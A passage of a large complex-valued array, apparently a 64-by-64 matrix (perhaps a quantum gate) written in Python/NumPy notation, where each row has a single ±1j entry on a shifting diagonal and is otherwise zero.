0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
